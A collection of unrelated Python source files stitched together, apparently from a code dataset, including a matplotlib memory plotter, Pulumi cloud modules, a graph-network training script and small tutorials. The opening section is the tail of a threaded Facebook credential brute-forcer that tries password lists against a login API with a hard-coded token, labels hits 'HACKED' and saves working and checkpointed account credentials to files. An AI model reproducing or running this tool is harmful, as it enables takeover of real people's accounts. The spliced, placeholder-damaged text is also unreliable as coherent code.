okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | StarcoderdataPython |
1763675 | <reponame>ashdnazg/toppy<gh_stars>0
import numpy as np
from ..system_stat import MemoryStat
from . import common
from .animated import AnimatedAxes
class MemoryPlotter(AnimatedAxes):
def __init__(self, mem=None):
self.mem = mem or MemoryStat()
def setup(self, axes, x):
self.mem.setup()
self.y_mem = common.none_array(x.size)
self.y_swap = common.none_array(x.size)
self.line_mem = axes.plot(x, self.y_mem, label='Memory')[0]
self.line_swap = axes.plot(x, self.y_swap, label='Swap')[0]
self.lines = [self.line_mem, self.line_swap]
axes.set_title('Memory')
axes.set_ylabel('% Memory')
axes.set_xlim(x.min(), x.max())
axes.set_ylim(0, 100)
axes.tick_params('x', bottom=False, labelbottom=False)
axes.grid(True, axis='y')
axes.legend()
return self.lines
def update(self):
self.mem.update()
common.additem_cyclic_inplace(self.y_mem, self.mem.mem.used * 100 / self.mem.mem.total)
common.additem_cyclic_inplace(self.y_swap, self.mem.swap.used * 100 / self.mem.swap.total)
self.line_mem.set_ydata(self.y_mem)
self.line_swap.set_ydata(self.y_swap)
return self.lines
| StarcoderdataPython |
1709374 | from argparse import ArgumentParser, Namespace
def generate_words(language: str = 'english', count: int = 24) -> str:
from mnemonic import Mnemonic
mnemonic = Mnemonic(language)
return mnemonic.generate(strength=int(count * 10.67))
def create_parser() -> ArgumentParser:
from hathor.cli.util import create_parser
parser = create_parser()
parser.add_argument('--language', help='Words language')
parser.add_argument('--count', type=int, help='Word count')
return parser
def execute(args: Namespace) -> None:
kwargs = {}
if args.language:
kwargs['language'] = args.language
if args.count:
kwargs['count'] = args.count
print(generate_words(**kwargs))
def main():
parser = create_parser()
args = parser.parse_args()
execute(args)
| StarcoderdataPython |
40662 | <reponame>legitbee/pulumi-ovh<filename>sdk/python/pulumi_ovh/get_vps.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetVpsResult',
'AwaitableGetVpsResult',
'get_vps',
'get_vps_output',
]
@pulumi.output_type
class GetVpsResult:
"""
A collection of values returned by getVps.
"""
def __init__(__self__, cluster=None, datacenter=None, displayname=None, id=None, ips=None, keymap=None, memory=None, model=None, name=None, netbootmode=None, offertype=None, service_name=None, slamonitoring=None, state=None, type=None, vcore=None, zone=None):
if cluster and not isinstance(cluster, str):
raise TypeError("Expected argument 'cluster' to be a str")
pulumi.set(__self__, "cluster", cluster)
if datacenter and not isinstance(datacenter, dict):
raise TypeError("Expected argument 'datacenter' to be a dict")
pulumi.set(__self__, "datacenter", datacenter)
if displayname and not isinstance(displayname, str):
raise TypeError("Expected argument 'displayname' to be a str")
pulumi.set(__self__, "displayname", displayname)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if ips and not isinstance(ips, list):
raise TypeError("Expected argument 'ips' to be a list")
pulumi.set(__self__, "ips", ips)
if keymap and not isinstance(keymap, str):
raise TypeError("Expected argument 'keymap' to be a str")
pulumi.set(__self__, "keymap", keymap)
if memory and not isinstance(memory, int):
raise TypeError("Expected argument 'memory' to be a int")
pulumi.set(__self__, "memory", memory)
if model and not isinstance(model, dict):
raise TypeError("Expected argument 'model' to be a dict")
pulumi.set(__self__, "model", model)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if netbootmode and not isinstance(netbootmode, str):
raise TypeError("Expected argument 'netbootmode' to be a str")
pulumi.set(__self__, "netbootmode", netbootmode)
if offertype and not isinstance(offertype, str):
raise TypeError("Expected argument 'offertype' to be a str")
pulumi.set(__self__, "offertype", offertype)
if service_name and not isinstance(service_name, str):
raise TypeError("Expected argument 'service_name' to be a str")
pulumi.set(__self__, "service_name", service_name)
if slamonitoring and not isinstance(slamonitoring, bool):
raise TypeError("Expected argument 'slamonitoring' to be a bool")
pulumi.set(__self__, "slamonitoring", slamonitoring)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if vcore and not isinstance(vcore, int):
raise TypeError("Expected argument 'vcore' to be a int")
pulumi.set(__self__, "vcore", vcore)
if zone and not isinstance(zone, str):
raise TypeError("Expected argument 'zone' to be a str")
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def cluster(self) -> str:
return pulumi.get(self, "cluster")
@property
@pulumi.getter
def datacenter(self) -> Mapping[str, str]:
return pulumi.get(self, "datacenter")
@property
@pulumi.getter
def displayname(self) -> str:
return pulumi.get(self, "displayname")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def ips(self) -> Sequence[str]:
return pulumi.get(self, "ips")
@property
@pulumi.getter
def keymap(self) -> str:
return pulumi.get(self, "keymap")
@property
@pulumi.getter
def memory(self) -> int:
return pulumi.get(self, "memory")
@property
@pulumi.getter
def model(self) -> Mapping[str, str]:
return pulumi.get(self, "model")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def netbootmode(self) -> str:
return pulumi.get(self, "netbootmode")
@property
@pulumi.getter
def offertype(self) -> str:
return pulumi.get(self, "offertype")
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> str:
return pulumi.get(self, "service_name")
@property
@pulumi.getter
def slamonitoring(self) -> bool:
return pulumi.get(self, "slamonitoring")
@property
@pulumi.getter
def state(self) -> str:
return pulumi.get(self, "state")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter
def vcore(self) -> int:
return pulumi.get(self, "vcore")
@property
@pulumi.getter
def zone(self) -> str:
return pulumi.get(self, "zone")
class AwaitableGetVpsResult(GetVpsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVpsResult(
cluster=self.cluster,
datacenter=self.datacenter,
displayname=self.displayname,
id=self.id,
ips=self.ips,
keymap=self.keymap,
memory=self.memory,
model=self.model,
name=self.name,
netbootmode=self.netbootmode,
offertype=self.offertype,
service_name=self.service_name,
slamonitoring=self.slamonitoring,
state=self.state,
type=self.type,
vcore=self.vcore,
zone=self.zone)
def get_vps(service_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVpsResult:
"""
Use this data source to access information about an existing resource.
"""
__args__ = dict()
__args__['serviceName'] = service_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('ovh:index/getVps:getVps', __args__, opts=opts, typ=GetVpsResult).value
return AwaitableGetVpsResult(
cluster=__ret__.cluster,
datacenter=__ret__.datacenter,
displayname=__ret__.displayname,
id=__ret__.id,
ips=__ret__.ips,
keymap=__ret__.keymap,
memory=__ret__.memory,
model=__ret__.model,
name=__ret__.name,
netbootmode=__ret__.netbootmode,
offertype=__ret__.offertype,
service_name=__ret__.service_name,
slamonitoring=__ret__.slamonitoring,
state=__ret__.state,
type=__ret__.type,
vcore=__ret__.vcore,
zone=__ret__.zone)
@_utilities.lift_output_func(get_vps)
def get_vps_output(service_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetVpsResult]:
"""
Use this data source to access information about an existing resource.
"""
...
| StarcoderdataPython |
4841955 | """
Author: <NAME>, 2018
Github: https://github.com/codewithsk/graph-cnn.mxnet
The Ohio State University
Graph Convolutional Network
File: train.py
Description: Training script for graph convolutional network
"""
import time
import argparse
import numpy as np
import mxnet as mx
from mxnet import autograd, gluon
from utils import load_data, accuracy
from model import GCN
# Parse command line arguments
parser = argparse.ArgumentParser() # pylint: disable=invalid-name
parser.add_argument('--num-gpu', type=int, default=-1,
help='Select GPU to train on. -1 for CPU.')
parser.add_argument('--fastmode', action='store_true', default=False,
help='Validate during training pass.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=200,
help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=16,
help='Number of hidden units.')
parser.add_argument('--dropout', type=float, default=0.0,
help='Dropout rate (1 - keep probability).')
parser.add_argument('--optim', type=str, default='adam',
help='What optimizer to use. Can be any accepted optimizer from MXnet.optimizer Default is adam')
args = parser.parse_args() #pylint: disable=invalid-name
# Set up context.
ctx = None # pylint: disable=invalid-name
if args.num_gpu == -1:
ctx = mx.cpu() # pylint: disable=invalid-name
else:
ctx = mx.gpu(args.num_gpu) # pylint: disable=invalid-name
# Set seed for random number generators in numpy and mxnet
np.random.seed(args.seed)
mx.random.seed(args.seed)
adj, features, labels, idx_train, idx_val, idx_test = load_data(ctx=ctx) # pylint: disable=invalid-name
model = GCN(nfeat=features.shape[1], # pylint: disable=invalid-name
nhid=args.hidden,
nclass=int(labels.max().asnumpy().item()) + 1,
dropout=args.dropout)
model.collect_params().initialize(ctx=ctx)
trainer = gluon.Trainer(model.collect_params(), # pylint: disable=invalid-name
'adam',
{'learning_rate': args.lr,})
# Note: Original implementation uses
# Negative Log Likelihood and not
# SoftmaxCrossEntropyLoss
loss = gluon.loss.SoftmaxCrossEntropyLoss() # pylint: disable=invalid-name
accs = [] # pylint: disable=invalid-name
for epoch in range(args.epochs):
t = time.time()
with autograd.record():
output = model(features, adj)
loss_train = loss(output[idx_train], labels[idx_train])
acc_train = accuracy(output[idx_train], labels[idx_train])
accs.append(acc_train)
loss_train.backward()
print('Epoch: {:04d}'.format(epoch+1),
'loss_train: {:.4f}'.format(np.mean(loss_train.asnumpy())),
'acc_train: {:.4f}'.format(acc_train),
'time: {:.4f}s'.format(time.time() - t))
trainer.step(1)
print(
'Training Accuracy: ', accuracy(output[idx_train], labels[idx_train]), '\n',
'Validation Accuracy: ', accuracy(output[idx_val], labels[idx_val]), '\n',
'Test Accuracy: ', accuracy(output[idx_test], labels[idx_test])
)
| StarcoderdataPython |
140362 | <reponame>ReesaJohn/3D60
import argparse
import sys
import os
import argparse
import csv
import itertools
import cv2
import numpy
import torch
def parse_arguments(args):
desc = (
"3D60 dataset statistics calculation."
)
parser = argparse.ArgumentParser(description=desc)
# paths
parser.add_argument("--suncg_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of SunCG")
parser.add_argument("--s2d3d_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of Stanford2D3D")
parser.add_argument("--m3d_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of Matterport3D")
parser.add_argument("--stats_path", type=str,\
default=".\\splits\\", \
help="Output path where the calculate dataset statistics files will be saved at.")
parser.add_argument("--max_depth", type=float,\
default=10, help="Max valid depth value for the statistics calculations")
return parser.parse_known_args(args)
def load_depth(filename, data_type=torch.float32):
dtmp = numpy.array(cv2.imread(filename, cv2.IMREAD_ANYDEPTH))
depth = torch.from_numpy(dtmp).type(data_type)
return depth.reshape(1, 1, depth.shape[0], depth.shape[1])
def calc_stats(name, folder, max_depth_meters=10.0):
depth_files = [f for f in os.listdir(folder) if ".exr" in f and "_depth_" in f]
total = torch.zeros(int(max_depth_meters * 2))
perc = torch.zeros(int(max_depth_meters * 2))
less_than_half_meter = 0.0
over_five_meters = 0.0
count = 0
for depth_file in depth_files:
filename = os.path.join(folder, depth_file)
depth = load_depth(filename)
b, c, h, w = depth.size()
depth = depth.reshape(h * w)
hist = torch.histc(depth, bins=int(2 * max_depth_meters), \
min=0, max=max_depth_meters)
total += hist
invalid = torch.sum(torch.isnan(depth)) + torch.sum(torch.isinf(depth)) \
+ torch.sum(depth > max_depth_meters)
valid = depth.size()[0] - invalid
if valid > 0:
perc += hist / valid
less_than_half_meter += torch.sum(depth < 0.5).float() / float(valid)
over_five_meters += torch.sum(depth > 5.0).float() / float(valid)
count += 1
return {
"name": name,
"total": total,
"perc": perc / count * 100,
'less0.5': less_than_half_meter / count * 100,
'over5': over_five_meters / count * 100
}
def calc_m3d_stats(m3d_path, max_depth_meters=10.0):
print("Calculating M3D stats...")
return calc_stats("M3D", m3d_path)
def calc_s2d3d_stats(s2d3d_path, max_depth_meters=10.0):
print("Calculating S2D3D stats...")
stats = []
count = 0
total = torch.zeros(int(2 * max_depth_meters))
perc = torch.zeros(int(2 * max_depth_meters))
less_than_half_meter = 0
over_five_meters = 0
for area in os.listdir(s2d3d_path):
stats.append(calc_stats("S2D3D", os.path.join(s2d3d_path, area)))
for area_stats in stats:
total += area_stats['total']
perc += area_stats['perc']
less_than_half_meter += area_stats['less0.5']
over_five_meters += area_stats['over5']
count = len(stats)
return {
"name" : "S2D3D",
"total": total,
"perc": perc / count,
'less0.5': less_than_half_meter / count,
'over5': over_five_meters / count
}
def calc_suncg_stats(suncg_path, max_depth_meters=10.0):
print("Calculating SunCG stats...")
return calc_stats("SCG", suncg_path)
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return zip(a, b)
def dump_stats(stats, args):
print("Dumping stats...")
for stat in stats:
with open(os.path.join(args.stats_path, '{}_stats.csv'.format(stat['name'])), mode='w') as csv_file:
stats_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
headers = ["{}-{}".format(p[0] / 2.0, p[1] / 2.0) for p in pairwise(range(0, 1 + 2 * int(args.max_depth)))]
headers += ["<0.5", ">5"]
stats_writer.writerow(headers)
stats_writer.writerow([str(float(v)) for v in stat['total']])
stats_writer.writerow([str(float(v) / 100.0) for v in stat['perc']] \
+ [float(stat['less0.5']) / 100.0, float(stat['over5']) / 100.0])
if __name__ == "__main__":
args, unknown = parse_arguments(sys.argv)
stats = []
''' Matterport3D '''
if 'm3d_path' in args:
m3d_stats = calc_m3d_stats(args.m3d_path, args.max_depth)
stats.append(m3d_stats)
''' Stanford2D3D '''
if 's2d3d_path' in args:
s2d3d_stats = calc_s2d3d_stats(args.s2d3d_path, args.max_depth)
stats.append(s2d3d_stats)
''' SunCG '''
if 'suncg_path' in args:
suncg_stats = calc_suncg_stats(args.suncg_path, args.max_depth)
stats.append(suncg_stats)
dump_stats(stats, args)
print("Done.") | StarcoderdataPython |
86932 | from ImageEmbeddings import ImageEmbeddings
from celery import Task, Celery
from cairosvg import svg2png
from numpy import array
from PIL import Image
from pickle import load
from base64 import b64encode
from io import BytesIO
from tempfile import NamedTemporaryFile
def svg2array(bytestring=None, size=32, tran_color=255):
if bytestring is None:
return None
f = NamedTemporaryFile()
svg2png(bytestring=bytestring, write_to=f)
img = Image.open(f)
img = array(img.resize((size, size)))
img[img[:, :, 3] == 0] = [tran_color, tran_color, tran_color, 0]
f.close()
return img[:, :, 0:3]
def array2bytes(arr):
img = Image.fromarray(arr)
byte_io = BytesIO()
img.save(byte_io, 'JPEG')
im_data = byte_io.getvalue()
return 'data:image/jpeg;base64,' + b64encode(im_data).decode()
class getSuggestions(Task):
_img_emb = None
def __init__(self):
self.opts = load(open('opts.conf', 'rb'))
@property
def img_emb(self):
if self._img_emb is None:
self._img_emb = ImageEmbeddings(self.opts.model, verbose=self.opts.verbose, load_in_memory=self.opts.memory,
layer=self.opts.layer, forceRecal=self.opts.forceRecal)
return self._img_emb
def run(self, data):
arr = svg2array(data)
if arr is None:
return None
self.img_emb.calculateDistances(arr)
return array2bytes(self.img_emb.viewCollageComparison(res_size=20))
app = Celery('tasks', broker='redis://localhost:6379/0', backend='redis://localhost:6379/0')
getSug = getSuggestions()
app.register_task(getSug)
| StarcoderdataPython |
163193 | <reponame>Dexterp37/twitter_sentimap
import json
import logging
import os
logger = logging.getLogger(__name__)
# How many tweets to put in a single JSON file? This
# directly influences.
ENTRIES_PER_FILE = 500
class SourceRecorder:
""" Write the incoming data to a set of valid JSON files.
The data is written in chunks, with each file containing
ENTRIES_PER_FILE number of tweet.
"""
def __init__(self, data_dir):
self._data_dir = data_dir
self._buffer = []
self._file_counter = 0
# Make sure the data_dir exists.
if not os.path.exists(self._data_dir):
os.makedirs(self._data_dir)
def _flush_buffer(self):
# Generate a filename for this chunk.
file_name = "chunk-{}.json".format(self._file_counter)
file_path = os.path.join(self._data_dir, file_name)
# Save the data from the buffer to the file.
with open(file_path, 'wt') as outfile:
json.dump(self._buffer, outfile)
# Empty the buffer and increase the file counter.
self._buffer = []
self._file_counter = self._file_counter + 1
def on_data_available(self, json_data):
logger.debug("Received data: {}\n".format(json.dumps(json_data)))
self._buffer.append(json_data)
if len(self._buffer) > ENTRIES_PER_FILE:
self._flush_buffer()
| StarcoderdataPython |
1711218 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sn
import pickle
from siuba import *
from datetime import datetime as dt
# Opening SHAP results with pickle
infile = open("lgbm_dict", "rb")
lgbm_dict = pickle.load(infile)
asdas=pickle.load(infile)
df_r2 = pd.DataFrame(columns=["game_id", "year", "r2_test", "r2_train"])
df_RMSE = pd.DataFrame(columns=["game_id", "year", "test", "train"])
for name, values in lgbm_dict.items():
r2 = pd.DataFrame({"game_id": [name], "year": [values[4]], "r2_test": [values[1]], "r2_train":[values[3]]})
df_r2 = df_r2.append(r2)
RMSE = pd.DataFrame({"game_id": [name], "year": [values[4]], "test": [values[0]], "train": [values[2]]})
df_RMSE = df_RMSE.append(RMSE)
# R2
r2_melted = df_r2[df_r2.r2_test > 0].melt(id_vars="game_id") >> arrange(_.date)
sn.lineplot(data = r2_melted, x = "game_id", y = "value", hue = "variable")
r2_melted.to_csv("C:/Users/USER/Downloads/r2_results.csv")
# RMSE
RMSE_melted = df_RMSE.melt(id_vars="game_id") >> arrange(_.date)
sn.lineplot(data = RMSE_melted, x = "game_id", y = "value", hue = "variable")
RMSE_melted.to_csv("C:/Users/USER/Downloads/RMSE_results.csv") | StarcoderdataPython |
3399444 | <filename>Python tests/classes_objects.py
lottery_player_dict = {
'name': 'Rolf',
'numbers': (5, 9, 12, 3, 1, 21)
}
class LotteryPlayer:
def __init__(self, name):
self.name = name
self.numbers = (5, 9, 12, 3, 1, 21)
def total(self):
return sum(self.numbers)
player_one = LotteryPlayer('Rolf')
player_one.numbers = (1, 2, 3, 6, 7, 8)
player_two = LotteryPlayer('John')
# print(player_two.total())
# print(player_one.numbers == player_two.numbers)
##
class Student:
def __init__(self, name, school):
self.name = name
self.school = school
self.marks = []
def average(self):
return sum(self.marks) / len(self.marks)
anna = Student('Anna', 'MIT')
anna.marks.append(18)
anna.marks.append(10)
anna.marks.append(33)
anna.marks.append(51)
print(anna.name, anna.school, anna.marks, anna.average()) | StarcoderdataPython |
115070 | # This script demonstrates changing the state of hardware
# handshake lines. While the script is running, you can see
# the DTR LED in the CoolTerm window blinking.
#
# Author: <NAME>, 04-30-2020
# CoolTerm version: 1.7.0
import sys
import time
import CoolTerm
s = CoolTerm.CoolTermSocket()
# Get the ID of the first open window
ID = s.GetWindowID(0)
if ID < 0:
print("No open windows")
sys.exit()
# Open the serial port
if s.Connect(ID):
print("Toggling DTR. Press CTRL-C to exit.")
try:
while True: # endless loop
s.SetDTR(ID, not s.GetDTR(ID))
time.sleep(0.5)
except KeyboardInterrupt:
pass
# Close the port
s.Disconnect(ID)
else:
print("Not Connected")
| StarcoderdataPython |
1708652 | <reponame>zsiciarz/jamchemy
import strawberry
from .mutations import Mutation
from .queries import Query
from .subscriptions import Subscription
schema = strawberry.Schema(query=Query, mutation=Mutation, subscription=Subscription)
| StarcoderdataPython |
190258 | <filename>environment.py
"""The Environment class and its helper classes."""
import ipaddress
from typing import Any, Dict, List
import pulumi_vsphere as vsphere
class Network:
"""Represents the IPv4 network being used in the environment."""
def __init__(self, network_id: str, subnet: ipaddress.IPv4Network, dns_servers: List[str], domains: List[str]):
""" Initializes Network with the given parameters.
Args:
network_id: The name of the network as configured in vSphere (typically the port group name)
subnet: The IPv4 subnet (i.e. 192.168.1.0/24)
dns_servers: The DNS servers for the environment
domains: The search domains for the environment
"""
self.id = network_id
self.subnet = subnet
self.dns_servers = dns_servers
self.domains = domains
class NodeSettings:
"""Represents the settings used to configure a specific node type.
When a node is created there are certain values that may differ depending on whether the node is of type master or
of type worker. This class holds this configuration information for each of those types.
"""
def __init__(self, name: str, network_offset: int, cpus: int, memory: int):
""" Initializes NodeSettings with the given parameters.
Args:
name: A format string in the form of 'NAME{num}' which will be used to generate node names
network_offset: The offset used to generate a node's IPv4 address
cpus: The number of CPUs that will be configured when this node type is created
memory: The amount of memory in MB that will be configured when this node type is created
"""
self.name = name
self.network_offset = network_offset
self.cpus = cpus
self.memory = memory
class ResourcePool:
"""Represents a resource pool in which the underlying virtual machine of a node will be deployed in.
When nodes are created they are assigned a resource group which determines where the underlying virtual machine for
the node will be created. The environment may have one or more resource pools defined to deploy nodes in. Each
resource pool has an associated weight which determines the distribution of nodes against it. A resource pool which
has a higher weight will have more nodes distributed in it. By default the distribution is round-robin style,
however, in the case of an uneven number of nodes the resource pools with higher weights will take precedence.
"""
def __init__(self, id: str, datastore_id: str, weight: int):
""" Initializes ResourcePool with the given parameters.
Args:
id: The unique resource pool id as defined in vSphere
datastore_id: The unique id of the associated datastore as defined in vSphere
weight: The weight used to set the priority of this resource pool
"""
self.id = id
self.datastore_id = datastore_id
self.weight = weight
@classmethod
def from_config(cls, dc: vsphere.Datacenter, pool_config: Dict[str, Any]):
"""Creates and returns a resource pool using the given resource pool configuration data.
Args:
dc: The vSphere datacenter this resource group is associated with
pool_config: A subset of configuration data (env['pools'][x]) used to configure the resource pool
Returns:
A ResourcePool object configured using the given parameters
"""
if pool_config['type'].lower() == 'cluster':
return ResourcePool(
id=vsphere.get_compute_cluster(str(dc.id), pool_config['name']).resource_pool_id,
datastore_id=vsphere.get_datastore(str(dc.id), name=pool_config['datastore']).id,
weight=pool_config['weight']
)
else:
return ResourcePool(
id=vsphere.get_host(str(dc.id), pool_config['name']).resource_pool_id,
datastore_id=vsphere.get_datastore(str(dc.id), name=pool_config['datastore']).id,
weight=pool_config['weight']
)
class Environment:
"""Represents an environment in which a cluster is created and nodes are deployed in.
Environments are typically unique per Pulumi stack. For instance, a dev stack may have a unique environment which
differs from the prod stack. The Environment class holds these unique configurations and serves as the primary
source of truth used to configure a cluster and its associated nodes. The values used to configure an environment
are held in a stack's configuration data. For details on each configuration value please refer to the README.
"""
def __init__(self, name,
datacenter: vsphere.Datacenter,
domain: str,
pools: List[ResourcePool],
network: Network,
node_template: vsphere.VirtualMachine,
master_config: NodeSettings,
worker_config: NodeSettings,
vault_address: str):
""" Initializes Environment using the given parameters."""
self.name = name
